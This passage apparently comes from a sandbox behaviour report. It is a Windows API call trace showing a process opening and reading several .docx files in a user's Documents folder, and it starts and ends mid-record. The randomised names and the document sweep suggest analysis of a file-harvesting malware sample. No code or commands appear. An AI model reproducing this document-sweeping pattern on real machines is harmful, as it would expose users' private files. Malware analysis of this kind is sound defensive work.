| out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", lpFilePart=0x0) returned 0x35 [0262.203] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\.", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", lpFilePart=0x0) returned 0x35 [0262.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", lpFilePart=0x0) returned 0x35 [0262.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", nBufferLength=0x105, lpBuffer=0x19ed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", lpFilePart=0x0) returned 0x35 [0262.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1e4) returned 1 [0262.204] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5p6ptjgmwlzzwhxu.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f260 | out: lpFileInformation=0x19f260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1d7e20, ftCreationTime.dwHighDateTime=0x1d85971, ftLastAccessTime.dwLowDateTime=0x3f4d47d0, ftLastAccessTime.dwHighDateTime=0x1d85973, ftLastWriteTime.dwLowDateTime=0x3f4d47d0, ftLastWriteTime.dwHighDateTime=0x1d85973, nFileSizeHigh=0x0, nFileSizeLow=0x303c)) returned 1 [0262.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e0) returned 1 [0262.204] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", nBufferLength=0x105, lpBuffer=0x19ecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx", lpFilePart=0x0) returned 0x35 [0262.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1ac) returned 1 [0262.204] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\5p6pTJgMWLzzWhXu.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\5p6ptjgmwlzzwhxu.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0262.204] GetFileType (hFile=0x444) returned 0x1 [0262.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1a8) returned 1 [0262.205] GetFileType (hFile=0x444) returned 0x1 [0262.234] ReadFile (in: hFile=0x444, lpBuffer=0x2291088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x2291088*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.236] ReadFile (in: hFile=0x444, lpBuffer=0x2291088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x2291088*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.236] ReadFile (in: hFile=0x444, lpBuffer=0x2291088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x2291088*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x444, lpBuffer=0x2291088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x2291088*, lpNumberOfBytesRead=0x19f220*=0x3c, lpOverlapped=0x0) returned 1 [0262.237] ReadFile (in: hFile=0x444, lpBuffer=0x2291088, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x2291088*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.238] CloseHandle (hObject=0x444) returned 1 [0262.238] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", lpFilePart=0x0) returned 0x2d [0262.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f270) returned 1 [0262.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oij2wkma.docx"), fInfoLevelId=0x0, lpFileInformation=0x22a309c | out: lpFileInformation=0x22a309c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682972f0, ftCreationTime.dwHighDateTime=0x1d84604, ftLastAccessTime.dwLowDateTime=0xba4ea120, ftLastAccessTime.dwHighDateTime=0x1d854a2, ftLastWriteTime.dwLowDateTime=0xba4ea120, ftLastWriteTime.dwHighDateTime=0x1d854a2, nFileSizeHigh=0x0, nFileSizeLow=0x8410)) returned 1 [0262.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f26c) returned 1 [0262.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", nBufferLength=0x105, lpBuffer=0x19ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", lpFilePart=0x0) returned 0x2d [0262.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\.", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", lpFilePart=0x0) returned 0x2d [0262.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", lpFilePart=0x0) returned 0x2d [0262.239] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", nBufferLength=0x105, lpBuffer=0x19ed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", lpFilePart=0x0) returned 0x2d [0262.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1e4) returned 1 [0262.239] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oij2wkma.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f260 | out: lpFileInformation=0x19f260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682972f0, ftCreationTime.dwHighDateTime=0x1d84604, ftLastAccessTime.dwLowDateTime=0xba4ea120, ftLastAccessTime.dwHighDateTime=0x1d854a2, ftLastWriteTime.dwLowDateTime=0xba4ea120, ftLastWriteTime.dwHighDateTime=0x1d854a2, nFileSizeHigh=0x0, nFileSizeLow=0x8410)) returned 1 [0262.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e0) returned 1 [0262.240] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", nBufferLength=0x105, lpBuffer=0x19ecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx", lpFilePart=0x0) returned 0x2d [0262.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1ac) returned 1 [0262.240] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\oiJ2wkMa.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\oij2wkma.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0262.240] GetFileType (hFile=0x444) returned 0x1 [0262.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1a8) returned 1 [0262.240] GetFileType (hFile=0x444) returned 0x1 [0262.240] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x410, lpOverlapped=0x0) returned 1 [0262.246] ReadFile (in: hFile=0x444, lpBuffer=0x22a3cb4, nNumberOfBytesToRead=0x3f0, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a3cb4*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.246] ReadFile (in: hFile=0x444, lpBuffer=0x22a4904, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22a4904*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.249] CloseHandle (hObject=0x444) returned 1 [0262.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", lpFilePart=0x0) returned 0x29 [0262.249] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f270) returned 1 [0262.249] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\star.docx"), fInfoLevelId=0x0, lpFileInformation=0x22d208c | out: lpFileInformation=0x22d208c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ef0bfd0, ftCreationTime.dwHighDateTime=0x1d84f28, ftLastAccessTime.dwLowDateTime=0x9dd8eda0, ftLastAccessTime.dwHighDateTime=0x1d84fa4, ftLastWriteTime.dwLowDateTime=0x9dd8eda0, ftLastWriteTime.dwHighDateTime=0x1d84fa4, nFileSizeHigh=0x0, nFileSizeLow=0xd1c2)) returned 1 [0262.249] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f26c) returned 1 [0262.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", nBufferLength=0x105, lpBuffer=0x19ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", lpFilePart=0x0) returned 0x29 [0262.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.249] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\.", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.250] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", lpFilePart=0x0) returned 0x29 [0262.250] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", lpFilePart=0x0) returned 0x29 [0262.250] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", nBufferLength=0x105, lpBuffer=0x19ed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", lpFilePart=0x0) returned 0x29 [0262.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1e4) returned 1 [0262.250] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\star.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f260 | out: lpFileInformation=0x19f260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ef0bfd0, ftCreationTime.dwHighDateTime=0x1d84f28, ftLastAccessTime.dwLowDateTime=0x9dd8eda0, ftLastAccessTime.dwHighDateTime=0x1d84fa4, ftLastWriteTime.dwLowDateTime=0x9dd8eda0, ftLastWriteTime.dwHighDateTime=0x1d84fa4, nFileSizeHigh=0x0, nFileSizeLow=0xd1c2)) returned 1 [0262.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e0) returned 1 [0262.250] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", nBufferLength=0x105, lpBuffer=0x19ecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx", lpFilePart=0x0) returned 0x29 [0262.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1ac) returned 1 [0262.250] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\STAR.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\star.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0262.250] GetFileType (hFile=0x444) returned 0x1 [0262.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1a8) returned 1 [0262.251] GetFileType (hFile=0x444) returned 0x1 [0262.251] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.252] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.253] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.253] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.254] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.255] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.255] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.256] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.257] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.257] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x1c2, lpOverlapped=0x0) returned 1 [0262.258] ReadFile (in: hFile=0x444, lpBuffer=0x22d38a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22d38a4*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.262] CloseHandle (hObject=0x444) returned 1 [0262.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", lpFilePart=0x0) returned 0x30 [0262.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f270) returned 1 [0262.263] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xb3gyzmjrsh.docx"), fInfoLevelId=0x0, lpFileInformation=0x22fd300 | out: lpFileInformation=0x22fd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc00fb0, ftCreationTime.dwHighDateTime=0x1d7d3d7, ftLastAccessTime.dwLowDateTime=0xa85ef480, ftLastAccessTime.dwHighDateTime=0x1d81d64, ftLastWriteTime.dwLowDateTime=0xa85ef480, ftLastWriteTime.dwHighDateTime=0x1d81d64, nFileSizeHigh=0x0, nFileSizeLow=0xd7e5)) returned 1 [0262.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f26c) returned 1 [0262.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", nBufferLength=0x105, lpBuffer=0x19ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", lpFilePart=0x0) returned 0x30 [0262.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\.", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", lpFilePart=0x0) returned 0x30 [0262.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", lpFilePart=0x0) returned 0x30 [0262.263] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", nBufferLength=0x105, lpBuffer=0x19ed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", lpFilePart=0x0) returned 0x30 [0262.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1e4) returned 1 [0262.264] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xb3gyzmjrsh.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f260 | out: lpFileInformation=0x19f260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc00fb0, ftCreationTime.dwHighDateTime=0x1d7d3d7, ftLastAccessTime.dwLowDateTime=0xa85ef480, ftLastAccessTime.dwHighDateTime=0x1d81d64, ftLastWriteTime.dwLowDateTime=0xa85ef480, ftLastWriteTime.dwHighDateTime=0x1d81d64, nFileSizeHigh=0x0, nFileSizeLow=0xd7e5)) returned 1 [0262.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e0) returned 1 [0262.264] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", nBufferLength=0x105, lpBuffer=0x19ecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx", lpFilePart=0x0) returned 0x30 [0262.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1ac) returned 1 [0262.264] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\Xb3GYZMjrsH.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xb3gyzmjrsh.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0262.264] GetFileType (hFile=0x444) returned 0x1 [0262.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1a8) returned 1 [0262.264] GetFileType (hFile=0x444) returned 0x1 [0262.264] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.268] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.268] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.268] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.269] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.269] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.270] ReadFile (in: 